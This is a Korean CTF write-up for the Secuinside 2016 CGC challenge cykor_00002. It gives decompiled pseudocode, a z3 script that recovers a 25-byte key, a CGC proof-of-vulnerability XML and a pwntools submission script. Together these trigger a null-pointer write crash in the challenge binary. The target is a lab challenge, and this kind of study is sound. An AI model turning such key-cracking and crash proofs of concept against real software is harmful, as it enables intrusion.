
https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150

write up : https://ctf.rip/secuinside2016-cykor00002/


vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : aaaaaaaaaaaaaaa
Get out of here :(


우선 실행해 보고, 실행 시 출력된 문자열을 기반으로 IDA 분석을 진행하도록 합시다.


/*
 * IDA pseudocode of the challenge's main routine. All sub_* names are
 * decompiler-assigned. sub_8049FC0 looks like a printf-style output routine,
 * but the decompiler shows no value argument for its "%s" calls — presumably
 * a variadic call whose arguments were not recovered; confirm in the listing.
 *
 * Flow as shown: print the banner, read a name into v1, compare its first 5
 * bytes against "ADMIN". Per the transcripts on this page, the "Hi %s" branch
 * is taken for a NON-matching name and the key prompt for "ADMIN", so
 * sub_8048E10 presumably returns non-zero on mismatch (strncmp-like) — verify.
 */
int main_sub_8048F50()
{
  char v1; // [esp+70h] [ebp-448h]@1
  char v2; // [esp+B0h] [ebp-408h]@3
  char v3; // [esp+B1h] [ebp-407h]@4
  int v4; // [esp+4B0h] [ebp-8h]@1

  v4 = 0; // set but never read in this listing
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("-          Simple Echo System          -\n");
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("What is your name?\n");
  sub_8048E90(&v1);
  if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )
  {
    sub_8049FC0("Hi %s\n");
    sub_8049FC0(": ");
    // Read into v2 with a limit argument of 1000 (10 is presumably the '\n'
    // delimiter — confirm) and NUL-terminate at the returned value, which
    // appears to be the byte count read; verify sub_80480A0's contract.
    *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
    sub_8049FC0("%s\n");
  }
  else
  {
    sub_8049FC0("+ Gimme a key : ");
    // The key is read into the global byte array starting at 01_byte_805F454.
    // The 25 bytes compare_key_sub_8048150 sums (01_byte_805F454 ..
    // 25_byte_805F46C) lie inside this 27-byte read, leaving room for a line
    // ending.
    sub_80480A0(&01_byte_805F454, 27, 10);
    if ( compare_key_sub_8048150() )
    {
      sub_8049FC0("Welcome Admin :)\n");
      sub_8049FC0(": ");
      // Unlike the branch above, this read is not NUL-terminated before the
      // "%s" output below.
      sub_80480A0(&v2, 1000, 10);
      // Write to address 0 when the echoed line starts with "CK": this is the
      // "Segmentation fault" reproduced in the transcript later on this page.
      if ( v2 == 'C' && v3 == 'K' )
        MEMORY[0] = 10;
      sub_8049FC0("%s\n");
    }
    else
    {
      sub_8049FC0("Get out of here :(\n");
    }
  }
  return 0;
}
 


compare_key_sub_8048150()를 확인하면 특정 값들을 모두 맞춰야만 통과할 수 있게 되어 있습니다.


/*
 * Key check, as decompiled. Each of the 25 conditions below is a linear sum
 * of a subset of the 25 global key bytes (01_byte_805F454 .. 25_byte_805F46C,
 * filled by the 27-byte read in main_sub_8048F50) compared against a
 * constant; v1 counts how many hold, and the key is accepted only when all
 * 25 do. The naming NN_byte_805F4xx corresponds to var_(NN-1) in the z3
 * script further down this page.
 */
_BOOL4 compare_key_sub_8048150()
{
  signed int v1; // [esp+0h] [ebp-4h]@1

  v1 = 0; // number of satisfied sum checks
  if ( 21_byte_805F468
     + 04_byte_805F457
     + 13_byte_805F460
     + 22_byte_805F469
     + 24_byte_805F46B
     + 08_byte_805F45B
     + 02_byte_805F455
     + 07_byte_805F45A
     + 10_byte_805F45D
     + 18_byte_805F465
     + 12_byte_805F45F
     + 19_byte_805F466
     + 06_byte_805F459 == 1068 )
    v1 = 1;
  if ( 11_byte_805F45E
     + 08_byte_805F45B
     + 10_byte_805F45D
     + 18_byte_805F465
     + 19_byte_805F466
     + 23_byte_805F46A
     + 03_byte_805F456
     + 02_byte_805F455
     + 14_byte_805F461
     + 16_byte_805F463 == 760 )
    ++v1;
  if ( 15_byte_805F462
     + 02_byte_805F455
     + 10_byte_805F45D
     + 17_byte_805F464
     + 01_byte_805F454
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 13_byte_805F460
     + 21_byte_805F468
     + 06_byte_805F459
     + 23_byte_805F46A
     + 22_byte_805F469 == 997 )
    ++v1;
  if ( 05_byte_805F458
     + 09_byte_805F45C
     + 20_byte_805F467
     + 22_byte_805F469
     + 02_byte_805F455
     + 07_byte_805F45A
     + 24_byte_805F46B
     + 14_byte_805F461
     + 17_byte_805F464
     + 13_byte_805F460 == 782 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 19_byte_805F466
     + 17_byte_805F464
     + 14_byte_805F461
     + 03_byte_805F456
     + 08_byte_805F45B
     + 07_byte_805F45A
     + 21_byte_805F468
     + 15_byte_805F462 == 778 )
    ++v1;
  if ( 21_byte_805F468
     + 20_byte_805F467
     + 06_byte_805F459
     + 10_byte_805F45D
     + 05_byte_805F458
     + 15_byte_805F462
     + 23_byte_805F46A
     + 22_byte_805F469
     + 04_byte_805F457
     + 25_byte_805F46C
     + 13_byte_805F460
     + 24_byte_805F46B
     + 19_byte_805F466
     + 14_byte_805F461 == 1123 )
    ++v1;
  if ( 23_byte_805F46A
     + 09_byte_805F45C
     + 06_byte_805F459
     + 14_byte_805F461
     + 16_byte_805F463
     + 12_byte_805F45F
     + 08_byte_805F45B
     + 11_byte_805F45E
     + 02_byte_805F455
     + 19_byte_805F466
     + 01_byte_805F454
     + 15_byte_805F462
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B == 1180 )
    ++v1;
  if ( 06_byte_805F459
     + 25_byte_805F46C
     + 12_byte_805F45F
     + 24_byte_805F46B
     + 20_byte_805F467
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 04_byte_805F457
     + 09_byte_805F45C
     + 14_byte_805F461
     + 21_byte_805F468
     + 19_byte_805F466
     + 03_byte_805F456
     + 10_byte_805F45D
     + 18_byte_805F465
     + 08_byte_805F45B
     + 13_byte_805F460 == 1498 )
    ++v1;
  if ( 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 05_byte_805F458
     + 25_byte_805F46C
     + 02_byte_805F455
     + 01_byte_805F454
     + 22_byte_805F469
     + 06_byte_805F459
     + 17_byte_805F464
     + 08_byte_805F45B
     + 13_byte_805F460
     + 16_byte_805F463
     + 21_byte_805F468
     + 04_byte_805F457 == 1213 )
    ++v1;
  if ( 18_byte_805F465
     + 22_byte_805F469
     + 10_byte_805F45D
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 15_byte_805F462
     + 21_byte_805F468
     + 02_byte_805F455
     + 09_byte_805F45C
     + 25_byte_805F46C == 779 )
    ++v1;
  if ( 01_byte_805F454
     + 04_byte_805F457
     + 20_byte_805F467
     + 03_byte_805F456
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 16_byte_805F463
     + 21_byte_805F468
     + 05_byte_805F458 == 742 )
    ++v1;
  if ( 16_byte_805F463
     + 24_byte_805F46B
     + 20_byte_805F467
     + 07_byte_805F45A
     + 18_byte_805F465
     + 11_byte_805F45E
     + 09_byte_805F45C
     + 05_byte_805F458
     + 06_byte_805F459
     + 12_byte_805F45F
     + 02_byte_805F455
     + 10_byte_805F45D
     + 15_byte_805F462
     + 04_byte_805F457
     + 21_byte_805F468 == 1196 )
    ++v1;
  if ( 07_byte_805F45A
     + 02_byte_805F455
     + 09_byte_805F45C
     + 14_byte_805F461
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 13_byte_805F460
     + 22_byte_805F469
     + 19_byte_805F466
     + 24_byte_805F46B
     + 15_byte_805F462
     + 16_byte_805F463
     + 23_byte_805F46A
     + 18_byte_805F465 == 1091 )
    ++v1;
  if ( 22_byte_805F469
     + 18_byte_805F465
     + 23_byte_805F46A
     + 01_byte_805F454
     + 05_byte_805F458
     + 02_byte_805F455
     + 19_byte_805F466
     + 20_byte_805F467
     + 13_byte_805F460 == 764 )
    ++v1;
  if ( 14_byte_805F461
     + 17_byte_805F464
     + 23_byte_805F46A
     + 02_byte_805F455
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 18_byte_805F465
     + 15_byte_805F462
     + 11_byte_805F45E
     + 05_byte_805F458
     + 09_byte_805F45C
     + 08_byte_805F45B
     + 01_byte_805F454
     + 19_byte_805F466
     + 07_byte_805F45A
     + 22_byte_805F469
     + 21_byte_805F468
     + 10_byte_805F45D == 1463 )
    ++v1;
  if ( 16_byte_805F463 + 09_byte_805F45C + 02_byte_805F455 + 12_byte_805F45F + 22_byte_805F469 + 20_byte_805F467 == 465 )
    ++v1;
  if ( 17_byte_805F464
     + 19_byte_805F466
     + 12_byte_805F45F
     + 25_byte_805F46C
     + 05_byte_805F458
     + 20_byte_805F467
     + 13_byte_805F460
     + 02_byte_805F455
     + 07_byte_805F45A
     + 14_byte_805F461
     + 01_byte_805F454
     + 22_byte_805F469 == 955 )
    ++v1;
  if ( 07_byte_805F45A
     + 08_byte_805F45B
     + 22_byte_805F469
     + 19_byte_805F466
     + 01_byte_805F454
     + 10_byte_805F45D
     + 15_byte_805F462
     + 18_byte_805F465 == 654 )
    ++v1;
  if ( 02_byte_805F455
     + 03_byte_805F456
     + 17_byte_805F464
     + 13_byte_805F460
     + 24_byte_805F46B
     + 01_byte_805F454
     + 11_byte_805F45E
     + 07_byte_805F45A
     + 21_byte_805F468
     + 19_byte_805F466
     + 23_byte_805F46A
     + 08_byte_805F45B
     + 16_byte_805F463 == 1030 )
    ++v1;
  if ( 23_byte_805F46A + 24_byte_805F46B + 12_byte_805F45F == 275 )
    ++v1;
  if ( 22_byte_805F469
     + 04_byte_805F457
     + 02_byte_805F455
     + 21_byte_805F468
     + 01_byte_805F454
     + 09_byte_805F45C
     + 13_byte_805F460 == 563 )
    ++v1;
  if ( 15_byte_805F462 + 06_byte_805F459 + 12_byte_805F45F + 19_byte_805F466 + 18_byte_805F465 + 25_byte_805F46C == 509 )
    ++v1;
  if ( 20_byte_805F467
     + 11_byte_805F45E
     + 13_byte_805F460
     + 22_byte_805F469
     + 17_byte_805F464
     + 25_byte_805F46C
     + 15_byte_805F462 == 556 )
    ++v1;
  if ( 02_byte_805F455
     + 13_byte_805F460
     + 22_byte_805F469
     + 20_byte_805F467
     + 19_byte_805F466
     + 03_byte_805F456
     + 04_byte_805F457
     + 12_byte_805F45F
     + 16_byte_805F463
     + 24_byte_805F46B
     + 23_byte_805F46A
     + 18_byte_805F465
     + 25_byte_805F46C
     + 09_byte_805F45C
     + 06_byte_805F459
     + 11_byte_805F45E
     + 21_byte_805F468
     + 17_byte_805F464 == 1464 )
    ++v1;
  if ( 15_byte_805F462
     + 22_byte_805F469
     + 08_byte_805F45B
     + 23_byte_805F46A
     + 21_byte_805F468
     + 06_byte_805F459
     + 17_byte_805F464
     + 11_byte_805F45E
     + 12_byte_805F45F == 758 )
    ++v1;
  // All 25 checks must hold; a single wrong byte fails the key.
  // NOTE(review): the listing as pasted ends here without the function's
  // closing brace.
  return v1 == 25;


여기에 있는 변수를 다음과 같이 치환하고, SMT 솔버 z3의 python 라이브러리를 활용하여 맞는 값을 찾습니다.

(※ z3 : https://github.com/Z3Prover/z3)

babyhack@ubuntu:~$ python scripts/mk_make.py --python --pypkgdir=/usr/lib/python2.7/dist-packages

babyhack@ubuntu:~$ cd ./build/make; sudo make install


z3가 준비되었다면 다음의 코드를 사용하면 됩니다.


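from z3 import *

# One symbolic Int per key byte. var_i stands for the decompiler's global
# (i+1)_byte_805F4xx (var_0 = 01_byte_805F454, ..., var_24 = 25_byte_805F46C).
# var_25 is referenced by none of the checks; it is kept only so the variable
# set matches the original script.
(var_0, var_1, var_2, var_3, var_4, var_5, var_6, var_7, var_8, var_9,
 var_10, var_11, var_12, var_13, var_14, var_15, var_16, var_17, var_18,
 var_19, var_20, var_21, var_22, var_23, var_24, var_25) = [
    Int('var_%d' % i) for i in range(26)]

key_bytes = [var_0, var_1, var_2, var_3, var_4, var_5, var_6, var_7, var_8,
             var_9, var_10, var_11, var_12, var_13, var_14, var_15, var_16,
             var_17, var_18, var_19, var_20, var_21, var_22, var_23, var_24]

# The binary sums single bytes, so a model with values outside 0..255 can
# never be typed in; without these bounds z3 is free to return one. The
# bound does not guarantee printable characters — tighten it if the model
# that comes back cannot be entered.
byte_range = [And(b >= 0, b <= 255) for b in key_bytes]

# The 25 sum checks from compare_key_sub_8048150, in the same order, one per
# line so each can be matched against the decompiled condition.
checks = [
    var_20 + var_3 + var_12 + var_21 + var_23 + var_7 + var_1 + var_6 + var_9 + var_17 + var_11 + var_18 + var_5 == 1068,
    var_10 + var_7 + var_9 + var_17 + var_18 + var_22 + var_2 + var_1 + var_13 + var_15 == 760,
    var_14 + var_1 + var_9 + var_16 + var_0 + var_13 + var_15 + var_11 + var_12 + var_20 + var_5 + var_22 + var_21 == 997,
    var_4 + var_8 + var_19 + var_21 + var_1 + var_6 + var_23 + var_13 + var_16 + var_12 == 782,
    var_19 + var_10 + var_18 + var_16 + var_13 + var_2 + var_7 + var_6 + var_20 + var_14 == 778,
    var_20 + var_19 + var_5 + var_9 + var_4 + var_14 + var_22 + var_21 + var_3 + var_24 + var_12 + var_23 + var_18 + var_13 == 1123,
    var_22 + var_8 + var_5 + var_13 + var_15 + var_11 + var_7 + var_10 + var_1 + var_18 + var_0 + var_14 + var_19 + var_2 + var_23 == 1180,
    var_5 + var_24 + var_11 + var_23 + var_19 + var_22 + var_0 + var_4 + var_3 + var_8 + var_13 + var_20 + var_18 + var_2 + var_9 + var_17 + var_7 + var_12 == 1498,
    var_18 + var_23 + var_14 + var_4 + var_24 + var_1 + var_0 + var_21 + var_5 + var_16 + var_7 + var_12 + var_15 + var_20 + var_3 == 1213,
    var_17 + var_21 + var_9 + var_10 + var_6 + var_14 + var_20 + var_1 + var_8 + var_24 == 779,
    var_0 + var_3 + var_19 + var_2 + var_23 + var_22 + var_15 + var_20 + var_4 == 742,
    var_15 + var_23 + var_19 + var_6 + var_17 + var_10 + var_8 + var_4 + var_5 + var_11 + var_1 + var_9 + var_14 + var_3 + var_20 == 1196,
    var_6 + var_1 + var_8 + var_13 + var_11 + var_24 + var_12 + var_21 + var_18 + var_23 + var_14 + var_15 + var_22 + var_17 == 1091,
    var_21 + var_17 + var_22 + var_0 + var_4 + var_1 + var_18 + var_19 + var_12 == 764,
    var_13 + var_16 + var_22 + var_1 + var_11 + var_24 + var_17 + var_14 + var_10 + var_4 + var_8 + var_7 + var_0 + var_18 + var_6 + var_21 + var_20 + var_9 == 1463,
    var_15 + var_8 + var_1 + var_11 + var_21 + var_19 == 465,
    var_16 + var_18 + var_11 + var_24 + var_4 + var_19 + var_12 + var_1 + var_6 + var_13 + var_0 + var_21 == 955,
    var_6 + var_7 + var_21 + var_18 + var_0 + var_9 + var_14 + var_17 == 654,
    var_1 + var_2 + var_16 + var_12 + var_23 + var_0 + var_10 + var_6 + var_20 + var_18 + var_22 + var_7 + var_15 == 1030,
    var_22 + var_23 + var_11 == 275,
    var_21 + var_3 + var_1 + var_20 + var_0 + var_8 + var_12 == 563,
    var_14 + var_5 + var_11 + var_18 + var_17 + var_24 == 509,
    var_19 + var_10 + var_12 + var_21 + var_16 + var_24 + var_14 == 556,
    var_1 + var_12 + var_21 + var_19 + var_18 + var_2 + var_3 + var_11 + var_15 + var_23 + var_22 + var_17 + var_24 + var_8 + var_5 + var_10 + var_20 + var_16 == 1464,
    var_14 + var_21 + var_7 + var_22 + var_20 + var_5 + var_16 + var_10 + var_11 == 758,
]

# solve() prints a satisfying model (or "no solution"); it returns nothing.
solve(*(byte_range + checks))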


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python exp.py
[var_16 = 89,
 var_23 = 85,
 var_20 = 82,
 var_1 = 72,
 var_6 = 69,
 var_12 = 77,
 var_15 = 51,
 var_19 = 85,
 var_22 = 95,
 var_21 = 78,
 var_5 = 77,
 var_14 = 78,
 var_11 = 95,
 var_9 = 72,
 var_3 = 87,
 var_10 = 69,
 var_17 = 95,
 var_4 = 95,
 var_7 = 95,
 var_8 = 84,
 var_2 = 79,
 var_13 = 48,
 var_18 = 84,
 var_24 = 80,
 var_0 = 83]
babyhack@ubuntu:~/tmp/Secuinside/2016$  


결과가 10진수로 표시되기 때문에, 이를 문자로 변환해 출력하는 코드를 작성해야 합니다.


[ convert ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ cat sort.py
# Model values reported by z3 for the 25 key bytes, listed here in key order
# (var_0 is the first byte of the key, var_24 the last).
var_0 = 83
var_1 = 72
var_2 = 79
var_3 = 87
var_4 = 95
var_5 = 77
var_6 = 69
var_7 = 95
var_8 = 84
var_9 = 72
var_10 = 69
var_11 = 95
var_12 = 77
var_13 = 48
var_14 = 78
var_15 = 51
var_16 = 89
var_17 = 95
var_18 = 84
var_19 = 85
var_20 = 82
var_21 = 78
var_22 = 95
var_23 = 85
var_24 = 80

key_bytes = [var_0, var_1, var_2, var_3, var_4, var_5, var_6, var_7, var_8,
             var_9, var_10, var_11, var_12, var_13, var_14, var_15, var_16,
             var_17, var_18, var_19, var_20, var_21, var_22, var_23, var_24]

# Each solved value is one byte of the key; print their characters in order.
print(''.join(chr(b) for b in key_bytes))
babyhack@ubuntu:~/tmp/Secuinside/2016$


[ result ]


babyhack@ubuntu:~/tmp/Secuinside/2016$ python sort.py
SHOW_ME_THE_M0N3Y_TURN_UP
babyhack@ubuntu:~/tmp/Secuinside/2016$ 


이제 찾은 키를 테스트해 보도록 합시다.


 vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : HOW_ME_THE_M0N3Y_TURN_UP
Get out of here :(
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: SHOW_ME_THE_M0N3Y_TURN_UP
Hi SHOW_ME_THE_M0N3Y_TURN_UP
:

vagrant@crs:~$
vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : SHOW_ME_THE_M0N3Y_TURN_UP
Welcome Admin :)
: CK
Segmentation fault (core dumped)
vagrant@crs:~$



CGC에 전달할 PoV는 예제 코드를 기반으로 XML로 작성합니다.


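<!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd">
<pov>
       <cbid>service</cbid>

        <replay>
              <!-- "//" is not a comment in XML: the original "// recv" / "// send"
                   lines were character data inside <replay>, which a validating
                   parser using replay.dtd may reject. They are XML comments now. -->

              <!-- recv: banner and name prompt -->
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>-          Simple Echo System          -\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>----------------------------------------\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>What is your name?\x0a</data></match></read>
              <!-- NOTE(review): in the manual runs on this page "name: " and ": " are
                   printed without a trailing newline, so a read delimited on \x0a may
                   block until the CB emits one — confirm the replay semantics before
                   relying on these two matches. -->
              <read><delim>\x0a</delim><match><data>name: \x0a</data></match></read>
              <!-- send: the name that selects the key-check branch -->
              <write><data>ADMIN\x0a</data></write>

              <!-- recv: key prompt -->
              <read><delim>\x0a</delim><match><data>+ Gimme a key : \x0a</data></match></read>
              <!-- send: the key recovered by the z3 script -->
              <write><data>SHOW_ME_THE_M0N3Y_TURN_UP\x0a</data></write>
              <!-- recv: acceptance message and echo prompt -->
              <read><delim>\x0a</delim><match><data>Welcome Admin :)\x0a</data></match></read>
              <read><delim>\x0a</delim><match><data>: \x0a</data></match></read>

              <!-- send: the "CK" line that triggers the null write (MEMORY[0] = 10) -->
              <write><data>CK\x0a</data></write>
        </replay>
</pov>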


exploit 코드는 다음과 같습니다.


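#!/usr/bin/python
from pwn import *

# Submits the PoV XML to the local harness. Judging from the exchange below,
# the harness expects the literal "XML", then the payload length, then the
# payload itself, each after a line of its own.
xml_name = "pov.xml"
host, port = "127.0.0.1", 1234

# Read the payload before connecting so a missing file fails fast and the
# handle is closed deterministically (the original leaked an open file).
with open(xml_name, 'rb') as f:
    payload = f.read()

r = remote(host, port)
print(r.recvline())
r.sendline("XML")
print(r.recvline())
r.sendline(str(len(payload)))
print(r.recvline())
r.sendline(payload)

r.interactive()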

